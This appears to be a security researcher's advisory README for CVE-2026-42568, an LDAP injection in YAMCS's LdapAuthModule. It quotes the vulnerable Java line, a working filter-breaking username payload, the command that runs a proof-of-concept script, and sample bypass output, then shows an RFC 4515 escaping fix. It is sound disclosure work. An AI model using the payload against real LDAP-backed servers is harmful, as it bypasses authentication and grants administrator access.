ex-cal1bur/CVE-2026-42568

# CVE-2026-42568 — YAMCS LDAP Injection in LdapAuthModule

## Summary

An LDAP injection vulnerability exists in `org.yamcs.security.LdapAuthModule`. The username parameter is inserted directly into LDAP search filters without RFC 4515 escaping, allowing authentication bypass.

| Field | Value |
|-------|-------|
| **CVE** | CVE-2026-42568 |
| **Severity** | MEDIUM |
| **CWE** | CWE-90: Improper Neutralization of Special Elements in LDAP Query |
| **Affected** | yamcs-core < 5.12.7 (with LDAP auth configured) |
| **Fixed in** | yamcs-core 5.12.7 |
| **Advisory** | [GHSA-cqh3-jg8p-336j](https://github.com/yamcs/yamcs/security/advisories/GHSA-cqh3-jg8p-336j) |

## Vulnerability Details

**Root cause (`LdapAuthModule.java`):**

```java
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping
```

With a typical `userFilter` of `(uid={0})`, a malicious username breaks the filter structure:

```
Input:  *)(uid=*))(|(uid=*
Filter: (uid=*)(uid=*))(|(uid=*)
Result: Universal match — authentication bypassed
```

## Proof of Concept

```bash
pip install requests
python3 poc.py http://localhost:8090
```

Expected output on vulnerable instance (with LDAP configured):

```
[1] Universal bypass (any account)
    Username: *)(uid=*))(|(uid=*
    Password: anything
    Result:   HTTP 200
    [!!!] AUTHENTICATION BYPASSED [!!!]
    Token received: eyJhbGciOiJSUzI1NiJ9...
```

## Impact

An unauthenticated attacker who can reach the YAMCS server can bypass authentication entirely when LDAP auth is configured, gaining access as an arbitrary user including administrators.

## Fix

Upgrade to `yamcs-core >= 5.12.7`. The fix applies RFC 4515 escaping to the username before constructing the LDAP filter.

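
The escaping step the fix describes, shown beside the raw substitution from the root cause. This is an added example, not code from the YAMCS repository or from this advisory; the class and method names are hypothetical, and the sample usernames other than the input string quoted above are constructed.

```java
// Added example: illustrates RFC 4515 value escaping; not taken from the YAMCS source tree.
public class LdapFilterEscapeDemo {

    // RFC 4515 section 3: these characters must be written as a backslash
    // followed by two hex digits when they appear inside an assertion value.
    static String escapeFilterValue(String value) {
        StringBuilder sb = new StringBuilder(value.length() + 8);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '\\': sb.append("\\5c"); break;
                case '*':  sb.append("\\2a"); break;
                case '(':  sb.append("\\28"); break;
                case ')':  sb.append("\\29"); break;
                case '\0': sb.append("\\00"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Pattern from the root cause: raw substitution into the filter template.
    static String buildFilterUnsafe(String userFilter, String username) {
        return userFilter.replace("{0}", username);
    }

    // Hardened form: escape the value first, then substitute.
    // String.replace is a literal replacement, so the added backslashes survive intact.
    static String buildFilterEscaped(String userFilter, String username) {
        return userFilter.replace("{0}", escapeFilterValue(username));
    }

    public static void main(String[] args) {
        String userFilter = "(uid={0})";       // typical template named on the page
        String[] samples = {
            "jdoe",                            // constructed: ordinary username
            "*)(uid=*))(|(uid=*",              // input string quoted on the page
            "o\\brien(ops)"                    // constructed: legitimate value that still needs escaping
        };
        for (String u : samples) {
            System.out.println("input   : " + u);
            System.out.println("unsafe  : " + buildFilterUnsafe(userFilter, u));
            System.out.println("escaped : " + buildFilterEscaped(userFilter, u));
            System.out.println();
        }
    }
}
```

With escaping applied, every `*`, `(`, `)` and `\` in the username is matched literally, so the filter keeps the single `(uid=...)` assertion the template defines.
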
## Timeline

| Date | Event |
|------|-------|
| 2026-05 | Vulnerability reported |
| 2026-05-26 | Fix released in yamcs-core 5.12.7 |
| 2026-05-26 | Public advisory published |

## Researcher

**Daniel Miranda Barcelona (Excal1bur)**

- GitHub: [https://github.com/ex-cal1bur](https://github.com/ex-cal1bur)
- LinkedIn: [https://linkedin.com/in/daniel-miranda-barcelona](https://linkedin.com/in/daniel-miranda-barcelona)
- Blog: [https://thedumpster.es](https://thedumpster.es)